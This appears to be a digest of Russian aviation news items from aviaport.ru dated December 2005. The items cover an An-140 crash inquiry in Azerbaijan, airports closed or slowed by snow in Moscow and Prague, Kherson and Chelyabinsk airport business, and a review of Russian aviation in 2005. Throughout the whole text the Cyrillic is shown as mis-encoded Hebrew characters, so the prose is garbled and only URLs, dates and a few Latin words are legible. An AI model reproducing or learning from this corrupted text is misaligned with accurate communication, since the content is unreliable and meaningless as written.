הגטדאעוכט ֲׁ, סטסעול ףןנאגכוםט, ‎םונדמסםאבזוםט ט הנףדטו בכט טסןנאגם ט נאבמעמסןמסמבם.ֽא ‎עאןו םאבמנא גסמע במנעמגל ףסענמיסעגמל נודטסענאצטט בכמ חאפטךסטנמגאםמ מהםמגנולוםםמו מעסףעסעגטו טםהטךאצטט ‎ךטןאזף גסוץ ענוץ אגטאדמנטחמםעמג (אגטאדמנטחמםע - ןנטבמנ, ןמךאחגא‏שטי ‎ךטןאזף ןמכמזוםטו ֲׁ ג ןנמסענאםסעגו). םאסעמשולף גנולוםט ןנטקטםא מעסףעסעגט טםהטךאצטט אגטאדמנטחמםעמג םו ףסעאםמגכוםא. ֳוםונאכםי הטנוךעמנ ךמםצונםא AZAL ִזאץאםדטנ ְסךונמג חאגטכ םא ןנוסס-ךמםפנוםצטט: "עא סטעףאצט םו סעאםהאנעםא ט ףםטךאכםא, ןמ‎עמלף עמ, קעמ ןנמטחמרכמ, גכועס סכוהסעגטול םוךטץ סמבעטי, ךמעמנו בףהףע טחףקאעס". ׀אבמעא ךמלטססטט ןנמהמכזאועס.ֿמ נוךמלוםהאצטט ךמלטססטט ֿנאגטעוכסעגמ ְחונבאיהזאםא ןנטםכמ נורוםטו גנולוםםמ ןנטמסעאםמגטע, המ חאגונרוםט נאססכוהמגאםט ךאעאסענמפ, ‎ךסןכףאעאצט‏ ְם-140-100 ג אגטאךמלןאםטט "ְחונבאיהזאם ױאגא ֹמככאנ". מםענאךע לוזהף ךמםצונםמל AZAL ט ױאנךמגסךטל דמסףהאנסעגוםםל אגטאצטמםםל ןנמטחגמהסעגוםםל ןנוהןנטעטול מסעאועס ג סטכו, מהםאךמ סנמךט גןמכםוםט ודמ בףהףע סךמננוךעטנמגאם ס ףקועמל מךמםקאעוכםץ גגמהמג ךמלטססטט, ךמעמנו מדכאסע ןמ נוחףכעאעאל נאססכוהמגאםט ךאעאסענמפ סאלמכועא ְם-140-100, ןנמטחמרוהרוי 23 הוךאבנ 2005 דמהא.ֽא ןנוסס-ךמםפונוםצטט, סמסעמגרויס 28 הוךאבנ ג ֱאךף, בכמ מדכארוםמ חאגכוםטו ךמלטססטט ןמ נאססכוהמגאםט‏ ןנטקטם ךאעאסענמפ, סמדכאסמגאםםמו סמ גסולט וו ףקאסעםטךאלט, ג עמל קטסכו ט ס ןנוהסעאגטעוכלט ױְֳֿֿ. ֿמ‎עמלף ןףבכטךאצטט נהא ‎כוךענמםםץ ָּׁ, סמהונזאשטו טםפמנלאצט‏ מ עמל, "קעמ ןנמטחגמהטעוכט סאלמכועמג םו סמדכאסם ס גגמהאלט ךמלטססטט", םו סממעגועסעגף‏ע הויסעגטעוכםמסעט.ױְֳֿֿ מבנאשאוע גםטלאםטו םא םוהמןףסעטלמסע ןנמטחגמכםץ טםעונןנועאצטי ןמחטצטט ןנוהןנטעט ט ןמהקונךטגאוע, קעמ םט ג מהםמל טח טםעונג‏, האםםמל ןנוהסעאגטעוכל ָּׁ, םט מהטם טח נףךמגמהטעוכוי ןנוהןנטעט םו גסךאחגאכ םט גונסטי ךאעאסענמפ סאלמכועא ְם-140-100, םט לםוםטי, ןנמעטגמנוקאשטץ גגמהאל ךמלטססטט ןמ וו נאססכוהמגאםט‏. - - - - - ְ‎נמןמנע "ױונסמם" טשוע מצוםשטךא - http://www.aviaport.ru/news/2005/12/29/99264.html - ֻטךגטהטנףולמו ךמללףםאכםמו ןנוהןנטעטו "ְ‎נמןמנע "ױונסמם" מבתגטכמ ךמםךףנס ןמ מעבמנף מצוםשטךא סגמודמ צוכמסעםמ-טלףשוסעגוםםמדמ ךמלןכוךסא - Thu, 29 Dec 2005 16:57:00 +0300 - ֻטךגטהטנףולמו ךמללףםאכםמו ןנוהןנטעטו "ְ‎נמןמנע "ױונסמם" מבתגטכמ ךמםךףנס ןמ מעבמנף מצוםשטךא סגמודמ צוכמסעםמ-טלףשוסעגוםםמדמ ךמלןכוךסא.־ב ‎עמל דמגמנטעס ג סממבשוםטט א‎נמןמנעא, סממבשאוע ׃ךנא¿םסך³ ֽמגטםט.־צוםךא ןנמגמהטעס הכ ףסעאםמגכוםט נאחלונא גחםמסא ג ףסעאגםי פמםה, ךמעמני גםמסטעס ױונסמםסךטל מבכאסעםל סמגועמל ג סמחהאגאולמו םא באחו א‎נמןמנעא מבשוסעגמ ס מדנאםטקוםםמי מעגועסעגוםםמסע‏ "ְ‎נמןמנע "ױונסמם".׃קאסעםטךאל ךמםךףנסא םומבץמהטלמ ןמהאע המךףלוםע ג ךמםךףנסםף‏ ךמלטססט‏ המ 12 םגאנ 2006 דמהא (גךכ‏קטעוכםמ).ְ‎נמןמנע םאץמהטעס ןמ אהנוסף: 73038, ױונסמם-38.־נדאםטחאצטמםםמ-ןנאגמגא פמנלא א‎נמןמנעא "ױונסמם" - ךמללףםאכםא סמבסעגוםםמסע (סמגלוסעםא סמבסעגוםםמסע עוננטעמנטאכםץ מבשטם מבכאסעט). - - - - - ־־־ "ֻ׃־ֹֻ-ְ‎נמ" ןנטמבנוכמ ף אגטאךמלןאםט "ׁטבטנ" עמןכטגמחאןנאגמקםי ךמלןכוךס ג לוזהףםאנמהםמל א‎נמןמנעף ׳וכבטםסךא - http://www.aviaport.ru/news/2005/12/29/99263.html - ־־־ "ֻ׃־ֹֻ-ְ‎נמ" (100-ןנמצוםעםא המקונם ךמלןאםט ־ְ־ "ֻ׃־ֹֻ") ןנטמבנוכמ ף ־ְ־ "ְגטאךמלןאםט "ׁטבטנ" ַׂ "ֱאכאםהטםמ" ג לוזהףםאנמהםמל א‎נמןמנעף ׳וכבטםסךא - Thu, 29 Dec 2005 16:55:00 +0300 - ־־־ "ֻ׃־ֹֻ-ְ‎נמ" (100-ןנמצוםעםא המקונם ךמלןאםט ־ְ־ "ֻ׃־ֹֻ") ןנטמבנוכמ ף ־ְ־ "ְגטאךמלןאםט "ׁטבטנ" עמןכטגמחאןנאגמקםי ךמלןכוךס (ַׂ) "ֱאכאםהטםמ" ג לוזהףםאנמהםמל א‎נמןמנעף ׳וכבטםסךא, סממבשאוע ןנוסס-סכףזבא ֻ׃־ֹֻא. ֳמהמגמי מבתול חאןנאגךט סמסעאגכוע ןנטלונםמ 40 עס. עמםם. ֲ בכטזאירוו גנול ־־־ "ֻ׃־ֹֻ-ְ‎נמ" ןכאםטנףוע ןנמגוסעט נוךמםסענףךצט‏ ט למהונםטחאצט‏ סךכאהא ֳּׁ ַׂ.ֲ םאסעמשוו גנול ־־־ "ֻ׃־ֹֻ-ְ‎נמ" ןנמטחגמהטע חאןנאגךף גמחהףרםץ סףהמג קונוח סמבסעגוםםף‏ סוע ַׂ ג א‎נמןמנעאץ ֽטזםודמ ֽמגדמנמהא, ֿונלט, ֲמכדמדנאהא, ׂ‏לוםט ט ׳וכבטםסךא. ֲ 2005 דמהף ־־־ "ֻ׃־ֹֻ-ְ‎נמ" מסףשוסעגטכמ חאןנאגךף ג מבתולו מךמכמ 100 עס. עמםם אגטאךונמסטםא.׀אחגטעטו אגטאעמןכטגמחאןנאגמקםמדמ בטחםוסא ןנוהףסלמענוםמ ג ֿנמדנאללו סענאעודטקוסךמדמ נאחגטעט ֳנףןן "ֻ׃־ֹֻ" ט ןנוהןמכאדאוע נאסרטנוםטו נםךא סבעא אגטאעמןכטגא ט סמחהאםטו נאחגטעמי סועט סמבסעגוםםץ עמןכטגמחאןנאגמקםץ ךמלןכוךסמג ג א‎נמןמנעאץ ׀מססטט ט חא נףבוזמל. - - - - - ֿמגטכאס i-mode גונסט סאיעא א‎נמןמנעא "ִמלמהוהמגמ" - http://www.aviaport.ru/news/2005/12/29/99262.html - ֲ ָםעונםועו ןמגטכאס i-mode גונסט סאיעא א‎נמןמנעא "ִמלמהוהמגמ". ִכ ןמכחמגאעוכוי למבטכםץ עוכופמםמג המסעףןםמ מםכאים-עאבכמ ט נאסןטסאםטו - Thu, 29 Dec 2005 16:52:00 +0300 - ֲ ָםעונםועו ןמגטכאס i-mode גונסט סאיעא א‎נמןמנעא "ִמלמהוהמגמ", - הכ ןמכחמגאעוכוי למבטכםץ עוכופמםמג המסעףןםמ סאלמו מסםמגםמו - מםכאים-עאבכמ ט נאסןטסאםטו.ֲ בכטזאירוו גנול בףהוע מעךנע ושו מהטם ךאםאכ המסעאגךט טםפמנלאצטט ס ָםעונםוע-סאיעא - סאיע הכ ֿ. ֽאןמלםטל, קעמ םא האםםי למלוםע חמםאלט ןמךנעט Wi-Fi גכ‏עס גוס געמנמי ‎עאז, בטחםוס-חאכ ט חאכ מפטצטאכםץ הוכודאצטי ט VIP.ֽא הםץ בףהוע נוראעס גמןנמס מב ףגוכטקוםטט חמם ןמךנעט, ג עמל קטסכו מבוסןוקטע המסעףן ןמ Wi-Fi ג חאכאץ ןנטכועא ט מזטהאםט לוזהףםאנמהםץ ט גםףענוםםטץ נויסמג, ג םמגץ ןמלושוםטץ, ךמעמנו ןמגעס ןמסכו גםמסא פאסאהא א‎נמגמךחאכא. - - - - - ֿנאזסךטי א‎נמןמנע קאסעטקםמ חאךנע טח-חא סםודמןאהא - http://www.aviaport.ru/news/2005/12/29/99261.html - ּוזהףםאנמהםי א‎נמןמנע ֿנאדט ׀ףחםו קאסעטקםמ חאךנע ג קועגונד ןמסכו םמקםמדמ סםודמןאהא - Thu, 29 Dec 2005 16:49:00 +0300 - ּוזהףםאנמהםי א‎נמןמנע ֿנאדט ׀ףחםו קאסעטקםמ חאךנע ג קועגונד ןמסכו םמקםמדמ סםודמןאהא. ֿנוסס-סוךנועאנ אהלטםטסענאצטט א‎נמןמנעא סממבשטכא, קעמ סאלמכוע םו למדףע גחכועאע ט א‎נמןמנע ג סמסעמםטט ןנטםטלאע עמכךמ 15 סאלמכועמג ג קאס. ־םא םו סממבשטכא גנולוםט ןמכםמדמ גמססעאםמגכוםט נאבמע א‎נמןמנעא. - - - - - ׀ִֶ מעךנמוע ןנלמו זוכוחםמהמנמזםמו סממבשוםטו מע ּמסךג המ א‎נמןמנעא "״ונולועוגמ" ך 2007 דמהף - http://www.aviaport.ru/news/2005/12/29/99260.html - ־ְ־ "׀מססטיסךטו זוכוחםו המנמדט" ןכאםטנףוע מעךנע ןנלמו זוכוחםמהמנמזםמו סממבשוםטו מע ּמסךג (ׁאגוכמגסךטי גמךחאכ) המ א‎נמןמנעא "״ונולועוגמ" ך 1 םגאנ 2007 ד. - Thu, 29 Dec 2005 16:45:00 +0300 - ־ְ־ "׀מססטיסךטו זוכוחםו המנמדט" (׀ִֶ) ןכאםטנףוע מעךנע ןנלמו זוכוחםמהמנמזםמו סממבשוםטו מע ּמסךג (ׁאגוכמגסךטי גמךחאכ) המ א‎נמןמנעא "״ונולועוגמ" ך 1 םגאנ 2007 דמהא, סממבשטכ דכאגא פטכטאכא ׀ִֶ "ּמסךמגסךא זוכוחםא המנמדא" (ִֶּ) ֲכאהטלטנ ׁעאנמסעוםךמ זףנםאכטסעאל ג לטםףגרף‏ סנוהף ג ּמסךגו."ּ נאססקטעגאול, קעמ ך םאקאכף 2007 דמהא ףסןוול ןמסענמטע זוכוחםמהמנמזםף‏ גועךף מע ֻמבםט המ א‎נמןמנעא", - סךאחאכ ֲ.ׁעאנמסעוםךמ. ־ם מעלועטכ, קעמ םאקאכמ סענמטעוכסעגא חאןכאםטנמגאםמ םא אןנוכ 2006 דמהא.ֿמ ודמ סכמגאל, נוק טהוע מ סענמטעוכסעגו 8,2 ךל ןףעוי, ךמעמנמו בףהוע פטםאםסטנמגאעס חא סקוע טםגוסעןנמדנאלל ׀ִֶ.ֳכאגא ִֶּ מעלועטכ עאךזו, קעמ ןמךא םוסםמ, דהו בףהוע נאסןמכאדאעס זוכוחםמהמנמזםא סעאםצט ג "״ונולועוגמ". "ֵסכט בףהוע דמעמג עונלטםאכ ("״ונולועוגמ-3" - ָװ), עמ ןמוחה ןמהמיהוע עףהא, וסכט םוע, עמ ל דמעמג ןמסענמטע מבקםף‏ סעאםצט‏", - סךאחאכ ֲ.ׁעאנמסעוםךמ. - - - - - ךסןכףאעאצט‏ סאלמכועמג ְם-140 למדףע גנולוםםמ ןנטמסעאםמגטע - http://www.aviaport.ru/news/2005/12/29/99259.html - ךסןכףאעאצט‏ סאלמכועמג ְם-140 למדףע גנולוםםמ ןנטמסעאםמגטע המ גסםוםט גסוץ מבסעמעוכסעג ךאעאסענמפ לארטם ג ְחונבאיהזאםו - Thu, 29 Dec 2005 16:43:00 +0300 - ךסןכףאעאצט‏ סאלמכועמג ְם-140 למדףע גנולוםםמ ןנטמסעאםמגטע המ גסםוםט גסוץ מבסעמעוכסעג ךאעאסענמפ לארטם ג ְחונבאיהזאםו.ׂאךף‏ עמקךף חנוםט גסךאחגא‏ע ‎ךסןונע, ךמללוםעטנף גונסטט ךאעאסענמפ סאלמכועא ןמה ֱאךף.ׁמדכאסםמ מהםמי טח םטץ, ןנטקטםמי ןאהוםט ְם-140 סעאכט עוץםטקוסךטו םוןמכאהךט, ט קעמב ןמכםמסע‏ טסךכ‏קטע גונמעםמסע ןמגעמנוםט ענאדוהטט, ןמכוע הוסעךא םאץמהשטץס סויקאס ג ‎ךסןכףאעאצטט ףךנאטםסךטץ אגטאךמלןאםטי לארטם ‎עמדמ עטןא למדףע ןנטמסעאםמגטע.ֿנוהסעאגטעוכט ֳמסאגטאסכףזב ׃ךנאטם האםםף‏ טםפמנלאצט‏ םו ןמהעגונזהא‏ע, חאגכ, קעמ זהףע מךמםקאעוכםץ גגמהמג ךמלטססטט ג ְחונבאיהזאםו.־הםאךמ ‎ךסןונע דמגמנע - חאןנוע גסו זו למזוע בע גגוהום, ססכאס םא מןע עמי זו ׀מססטט, דהו טח-חא ןמכמלךט ג ראססט ןנוחטהוםעסךמדמ סאלמכועא בכט ןמסעאגכום םא ןנטךמכ גסו לארטם האםםמי למהוכט. - - - - - ְ‎נמןמנע ּמסךג נאבמעא‏ע "ןמ פאךעטקוסךמי ןמדמהו" - http://www.aviaport.ru/news/2005/12/29/99258.html - ָח-חא סטכםמדמ סםודמןאהא ג ּמסךגו א‎נמןמנע "ֲםףךמגמ", "ִמלמהוהמגמ" ט "״ונולועוגמ" נאבמעא‏ע "ןמ פאךעטקוסךמי ןמדמהו", םמ חאהונזוך ס גכועאלט ט ןנטבעטול נויסמג םוע - Thu, 29 Dec 2005 16:36:00 +0300 - ָח-חא סטכםמדמ סםודמןאהא ג ּמסךגו סעמכטקםו א‎נמןמנע "ֲםףךמגמ", "ִמלמהוהמגמ" ט "״ונולועוגמ" נאבמעא‏ע "ןמ פאךעטקוסךמי ןמדמהו", םמ חאהונזוך ס גכועאלט ט ןנטבעטול נויסמג םוע. ־ב ‎עמל סממבשטכ ג קועגונד ׀ְָ ֽמגמסעט ןנוהסעאגטעוכ ײוםענאכםמי הטסןועקונסךמי סכףזב (ײִׁ) ּמסךג."ֲסו סעמכטקםו א‎נמןמנע נאבמעא‏ע סויקאס "ןמ פאךעטקוסךמי ןמדמהו", עמ וסע, ןטכמע סאלמסעמעוכםמ ןנטםטלא‏ע נורוםטו מ ןמסאהךו. ־הםאךמ םטךאךטץ חאהונזוך ס גכועאלט ט ןנטבעטול נויסמג ג א‎נמןמנעאץ םוע", - סךאחאכ ןנוהסעאגטעוכ ײִׁ.־ם עאךזו מעלועטכ, קעמ "םט מהטם א‎נמןמנע םו מבתגטכ מ חאךנעטט טח-חא ןמדמה"."ֲמ גסוץ א‎נמןמנעאץ סויקאס גטהטלמסע סמסעאגכוע במכוו עסקט לוענמג. ֲסו גחכוע ט ןמסאהךט מסףשוסעגכ‏עס ןמ נאסןטסאםט‏, בוח סבמוג. װאךעמג חאךנעט א‎נמןמנעמג םו בכמ", - סממבשטכ סמבוסוהםטך אדוםעסעגא.ֿמ ודמ סכמגאל, גמ גסוץ סעמכטקםץ א‎נמןמנעאץ ג םאסעמשוו גנול נאבמעאוע סןוצעוץםטךא הכ נאסקטסעךט סםודא. "ֲ סכףקאו ףסטכוםט סםודמןאהא, ג א‎נמןמנעאץ בףהוע גגוהוםא המןמכםטעוכםא סןוצעוץםטךא", - המבאגטכ ןנוהסעאגטעוכ ײִׁ. - - - - - ְגטאןנמל םא טחכועו - http://www.aviaport.ru/news/2005/12/29/99257.html - ַאעםףגרווס מזטהאםטו נורוםטי גכאסעוי מ סףהבו נמססטיסךמדמ אגטאןנמלא ט סךאםהאכ גמךנףד חאןנועא םא ןמכוע ָכ-96-300 - דכאגםו טעמדט אגטאצטמםםמי מענאסכט ג 2005 ד. - Thu, 29 Dec 2005 16:31:00 +0300 - ַאעםףגרווס מזטהאםטו נורוםטי גכאסעוי מ סףהבו נמססטיסךמדמ אגטאןנמלא ט סךאםהאכ גמךנףד חאןנועא םא ןמכוע סאלמדמ םמגמדמ מעוקוסעגוםםמדמ האכםולאדטסענאכםמדמ סאלמכועא ָכ-96-300 - דכאגםו טעמדט אגטאצטמםםמי מענאסכט ג 2005 דמהף.ֿנוהןמכמזטעוכםמ םא ןונגמל ‎עאןו ג ־ְ בףהףע גםוסום דמסףהאנסעגוםםו ןאךוע אךצטי ְױ "ׁףץמי", ְּ "ָכ‏רטם", ־ְ־ "ׂףןמכוג", חאגמהא "ׁמךמכ", מלסמלמכסךמדמ-םא-ְלףנו אגטאצטמםםמדמ ןנמטחגמהסעגוםםמדמ מבתוהטםוםט, ֽמגמסטבטנסךמדמ אגטאצטמםםמדמ ןנמטחגמהסעגוםםמדמ מבתוהטםוםט, "ְגטא‎ךסןמנעא", א עאךזו װטםאםסמגמי כטחטםדמגמי ךמלןאםטט ט ךמלןאםטט "ָכ‏רטם װטםאםס מ". ֽא געמנמל ‎עאןו ך ךמנןמנאצטט ןמהךכ‏קטעס "ָנךףע", ךמעמנמלף לםמדטו ןנמקאע כטהונסעגמ ג ךמנןמנאצטט. ־הםא טח סאלץ גונמעםץ ךאםהטהאעףנ םא עמ, קעמב גמחדכאגטע ־ְ, - טסןמכםטעוכםי הטנוךעמנ "ָנךףעא" ֲאכונטי ֱוחגונץםטי. ֲ 2005 דמהף ןנאגטעוכסעגמ ןכאםטנמגאכמ גסונוח חאםעס מבתוהטםוםטול נמססטיסךטץ אגטאצטמםםץ אךעטגמג. ֲ פוגנאכו ֲכאהטלטנ ֿףעטם נאסןמנהטכס ןמהדמעמגטע ןנמוךע ףךאחא ןמ מבתוהטםוםט‏ גסוץ אגטאסענמטעוכםץ חאגמהמג ג והטםף‏ ךמלןאםט‏. ֿנוהןמכאדאכמס, קעמ ןנוחטהוםע ןמהןטרוע המךףלוםע ך 1 הוךאבנ. ֽמ ג טעמדו מם םו עמכךמ םו בכ ןמהןטסאם, םמ ט המ סטץ ןמנ מסעאועס חאדאהךמי, םא ךאךטץ ףסכמגטץ בףהוע ןנמגמהטעס ךמםסמכטהאצט.מםסמכטהאצט נמססטיסךטץ גונעמכועםץ חאגמהמג ג 2005 דמהף סמסעמכאס. ֲ סמסעאג ץמכהטםדא םא באחו "־במנמםןנמלא" גמרכט ־ְ־ "ּמסךמגסךטי גונעמכועםי חאגמה", ־ְ־ "׃כאם-׃הטםסךטי אגטאצטמםםי חאגמה", ־ְ־ "אחאםסךטי גונעמכועםי חאגמה", ־ְ־ "׀מסעגונעמכ", ־ְ־ "ּמסךמגסךטי לארטםמסענמטעוכםי חאגמה "ֲןונוה"", ־ְ־ "ׁעףןטםסךמו לארטםמסענמטעוכםמו ןנמטחגמהסעגוםםמו ןנוהןנטעטו". ֽמ ןנמצוסס מסעאגטכ במכרו גמןנמסמג, קול מעגועמג, ןנטחםא‏עס ‎ךסןונע. "ֿונוץמה םא מהםף אךצט‏ ןנמרוכ ךאך-עמ סךמלךאםםמ. ֽוסםמ, ןמ ךאךמלף ןנטםצטןף בכ גבנאם ךמ‎פפטצטוםע מבלוםא, םאןנטלונ", - ןמהגמהטע טעמדט אםאכטעטך ָ "׀וםוססאםס אןטעאכ" ּאנטםא ְכוךסווםךמגא.־בתוהטםוםטו אגטאךמלןאםטי בכמ ןנמגאכוםמ, מב ‎עמל ג ךמםצו הוךאבנ םאןמלםטכ לטםטסענ ענאםסןמנעא ָדמנ ֻוגטעטם. ֽט מבתוהטםוםטו גמךנףד "נאסינ" (AiRUnion), םט נופמנלאצט "ֿףכךמגמ" ט "׀מססטט" ג ןמכםמי לונו ג 2005 דמהף םו חאגונרטכטס. ּוזהף עול ךמםסמכטהאצט - והטםסעגוםםי סןמסמב גזטע םא נםךו הכ נמססטיסךטץ אגטאךמלןאםטי ג ףסכמגטץ המנמדמדמ דמנ‏קודמ ט טחםמרוםםמי עוץםטךט.ַאעמ ג 2005 דמהף ׀מססטט ףהאכמס ןנמגוסעט סאלי במכרמי אגטאךמסלטקוסךטי סאכמם חא גס‏ טסעמנט‏ - ְּׁ-2005 ג ןמהלמסךמגםמל ֶףךמגסךמל. ׁאכמם סמבנאכ ןנוהסעאגטעוכוי במכוו קול 600 ךמלןאםטי טח 40 סענאם.ֿמ ‎עמלף ןמךאחאעוכ‏ ְּׁ ףזו למזםמ סנאגםטגאע ס ךנףןםוירטלט סאכמםאלט ג ֻו-ֱףנזו (װנאםצט), ג ִףבאו (־ְ), װאנםבמנמ (ֲוכטךמבנטעאםט).ֽו ןמכףקטכמס עמכךמ סהוכאע אגטאצטמםםף‏ נלאנךף גסולטנםמי. ֲ ֶףךמגסךטי ןנטוץאכט עמכךמ ןנמטחגמהטעוכט, ךמעמנו בכט חאטםעונוסמגאם ג סמענףהםטקוסעגו ס ׀מססטוי. ֲ טעמדו חא ןע הםוי אגטאסאכמםא ג ֶףךמגסךמל בכט חאךכ‏קום ךמםענאךע םא מבשף‏ סףללף $4 לכנה, ףקטעגא ןנוהגאנטעוכםו סמדכארוםט. ֽא אגטאסאכמםו ג ִףבאו ג םמבנו 2005 דמהא ךמםענאךע בכט חאךכ‏קום םא סףללף $25 לכנה. ָ וסכט ג ִףבאו סמכטנמגאכט ג מסםמגםמל עאךטו לטנמגו דטדאםע, ךאך Airbus ט Boeing, עמ ג ֶףךמגסךמל מםט בכט םוחאלועם: במכרו גסודמ ךמםענאךעמג חאךכ‏קטכא "ָכ‏רטם פטםאםס" - ןנטבכטחטעוכםמ םא $1,6 לכנה. "ָ גסו-עאךט עאךמדמ סטכםמדמ סאכמםא ןמ בטחםוס-סמסעאגכ‏שוי ושו םו בכמ", - חאלוקאוע אםאכטעטך ײוםענא אםאכטחא סענאעודטי ט עוץםמכמדטי מםסעאםעטם ּאךטוםךמ.ֻועמל, סנאחף ןמסכו אגטאסאכמםא, גס‏ מענאסכ ןמענס סךאםהאכ ס חאןנועמל םא ןמכוע ָכ-96-300.ּםוםט אםאכטעטךמגְםאכטעטךט, מןנמרוםםו "ֳאחועמי.Ru", םו סקטעא‏ע ףץמהשטי דמה ףהאקםל ןמ לםמדטל ןנטקטםאל."ֽוע והטםמי ןמכטעטךט, ךאךטו סאלמכוע נאחנאבאעגאע, ךאךטו ןמההונזטגאע. ֲ טעמדו ןנמהףךעא םוע, א וסע עמכךמ ךמםךףנוםעםא במנבא, ךמעמנא לוראוע אגטאןנמלף. ֲמחלמזםמ, ג 2006 דמהף מע סכמג ןונויהףע ך הוכף", - סקטעאוע ָכ ּאךאנמג טח "ְםעאםע אןטעאכ"."ֶהאכט במכרודמ, - ןמהעגונזהאוע ּאנטםא ְכוךסווםךמגא טח "׀וםוססאםס אןטעאכא". - ֿנטקול ‎עמ מזטהאםטו חאעםףכמס. ָ ‎עמ ןנט עמל, קעמ ף מענאסכט במכרמי ןמעוםצטאכ"."ֿנאךעטקוסךט ג מבכאסעט אגטאןנמלרכוםםמסעט םטקודמ סונוחםמדמ חא דמה םו ןנמטחמרכמ", - מעלוקאוע הטנוךעמנ ךמםסאכעטםדמגמי ךמלןאםטט Infomost ֱמנטס ׀באך."ױמעוכמס ב במכרודמ, םמ ט נוחףכעאע מקוגטהם. ֳמסףהאנסעגמ ןמגונםףכמס ך אגטאןנמלף. ֲ ןמסעסמגועסךמו גנול ושו םטךמדהא סעמכךמ גםטלאםט םו בכמ םט ןמ הוםדאל, םט ןמ נאחכטקםל ןנמוךעאל ט ןכאםאל נאחגטעט", - ףגונום מםסעאםעטם ּאךטוםךמ טח ײוםענא אםאכטחא סענאעודטי ט עוץםמכמדטי. ֿנוחטהוםעסךטי סאלמכוע, א עאךזו ושו 12 כאיםונמג נמססטיסךטץ אגטאךמלןאםטי גסעאכט במכוו קול םא לוסצ. אך סעאכמ טחגוסעםמ ןמחהםוו, טלוםםמ אהלטםטסענאצט ןנוחטהוםעא ןונוסענאץמגאכאס ט ןמגכטכא םא נורוםטו ׀מסענאםסםאהחמנא חאןנועטע ןמכוע ָכ-96-300. עמ ןנמטחמרכמ ןמסכו עמדמ, ךאך ג םאקאכו אגדףסעא ֲכאהטלטנ ֿףעטם, םאץמהטגרטיס ס מפטצטאכםל גטחטעמל ג װטםכםהטט, םו סלמד גכועוע טח א‎נמןמנעא ׂףנךף ט בכ גםףזהום ןונוסוסע םא חאןאסםמי סאלמכוע. ׃ כאיםונמג בכט גגכום םאנףרוםט עמנלמחםמי סטסעול.־ע חאןנועא ןמסענאהאכט םוסךמכךמ נמססטיסךטץ אגטאךמלןאםטי, ג עמל קטסכו "ְ‎נמפכמע", "ִמלמהוהמגסךטו אגטאכטםטט" ט "נאסםמנסךטו אגטאכטםטט". ֲסו מםט נאססלאענטגאכט גמחלמזםמסע טסךמג ך דמסףהאנסעגף טכט ך ןנמטחגמהטעוכל, םמ ג טעמדו מעךאחאכטס מע םאלונוםט גמחלוסעטע ןמעונט.ַאןנוע םא מהטם טח סאלץ םמגץ נמססטיסךטץ דנאזהאםסךטץ סאלמכועמג ג מקונוהםמי נאח ףהאנטכ ןמ ןנוסעטזף מעוקוסעגוםםמדמ אגטאןנמלא. ֳוםהטנוךעמנ ֲמנמםוזסךמדמ אךצטמםונםמדמ סאלמכועמסענמטעוכםמדמ מבשוסעגא, ןנמטחגמהטגרודמ הועאכט ך ָכ-96, ֲקוסכאג ׁאכטךמג גםףזהום בכ ףיעט ג מעסעאגךף.ֿמסכו סךאםהאכא ס ָכ-96-300 ס םמגמי מסענמעמי סעאכ גמןנמס מ ןמרכטםאץ םא סאלמכוע חאנףבוזםמדמ ןנמטחגמהסעגא. ִֽׁ ט עאלמזוםםי סבמנ גלוסעו סמסעאגכ‏ע 40% צום סאלמכועא. ֽמ ‎עמע גמןנמס המ ךמםצא דמהא עאךזו םו בכ נורום.ַא נףבוזמל 2005 דמה חאןמלםטעס ןנוזהו גסודמ דמםךמי Airbus ט Boeing ג מבכאסעט האכםולאדטסענאכםץ סאלמכועמג. Airbus ןנוהכאדאוע A350 - ‎ךמםמלטקםי כאיםונ, םמ מם סמגונרטע ןונגי ןמכוע עמכךמ ך 2010 דמהף. Boeing מבושאוע ך ‎עמלף גנולוםט ףזו םאקאע ןנמהאגאע B787 - Dreamliner. ֱמנבא טהוע ט ןמ םאטבמכוו גלוסעטעוכםל סאלמכועאל - A380 ט Boeing 777-200LR Worldliner. ֿונגי ג 2005 דמהף ןנמרוכ טסןעאעוכםו ןמכוע ט סאלמסעמעוכםמ ןנטכועוכ ג ִףבאי. ֲעמנמי 10 םמבנ ףסעאםמגטכ נוךמנה ןמ האכםמסעט ןמכועא ןאססאזטנסךמדמ סאלמכועא בוח המחאןנאגךט, ןונוכועוג טח ֳמםךמםדא ג ֻמםהמם. ֲ ׀מססטט אגטאךמלןאםטט ןמךא םו נורא‏עס םא גבמנ לוזהף דטדאםעאלט לטנמגמדמ אגטאסענמטעוכסעגא. ֿמ האםםל, ןמגטגרטלס ג ךמםצו הוךאבנ, "ְ‎נמפכמע" בכטזו ך גבמנף Boeing 787, םוזוכט A350.ִנףדטל חםאקטלל הכ מענאסכט סמבעטול סעאכמ עמ, קעמ ג םאקאכו הוךאבנ בכ ןמהןטסאם ןונגי ךנףןםי ךמםענאךע םא RRJ - נמססטיסךטי נודטמםאכםי סאלמכוע, נאחנאבאעגאולי ְױ "ׁףץמי" ט ןמכףקטגרטי ןמההונזךף דמסףהאנסעגא. "ְ‎נמפכמע" סמדכאסטכס ךףןטע 30 בכטזםולאדטסענאכםץ סאלמכועמג ןנמטחגמהסעגא "ׁףץמדמ" קונוח װטםאםסמגף‏ כטחטםדמגף‏ ךמלןאםט‏. ֿנאגהא, ט חהוס מבמרכמס םו בוח סךאםהאכא: הוןףעאע ֳמסהףל ְכוךסאםהנ ֻובוהוג, ךמםענמכטנף‏שטי מךמכמ 30% אךצטי "ְ‎נמפכמעא" קונוח ֽאצטמםאכםף‏ נוחונגםף‏ ךמנןמנאצט‏, ןממבושאכ גסולט גמחלמזםלט סןמסמבאלט חאבכמךטנמגאע סהוכךף ג טםעונוסאץ הנףדמדמ בכטזםולאדטסענאכםמדמ סאלמכועא - ְם-148 מע "ְםעמםמגא".עמע זו סאלמכוע ןמםנאגטכס ט נףךמגמהטעוכ‏ הנףדמי נמססטיסךמי אגטאךמלןאםטט - "נאסינ". ׂאל ןמסקטעאכט, קעמ ףזו ןמסענמוםםי סאלמכוע כףקרו םוןמסענמוםםמדמ, ט ןנוהןמקכט ךףןטע הוסע ְם-148 ט ןמךא גמחהונזאעס מע RRJ. ֽמ דמסףהאנסעגמ סםמ האכמ ןמםע, ךאךמדמ טח ןנועוםהוםעמג מםמ ןמההונזטגאוע. ֲ ךמםצו הוךאבנ טסעמקםטךט ג ׀מסטלףשוסעגו, מסםמגםמל אךצטמםונו "נאסינ", האכט ןמםע, קעמ פוהונאכםמו אדוםעסעגמ חאבכמךטנףוע סהוכךף. - - - - - ֽמגמסטבטנסךמו אגטאסענמוםטו: סמגנולוםםא ׀מססט ט וו םובוסםי חאשטעםטך נמהטכטס ןמה 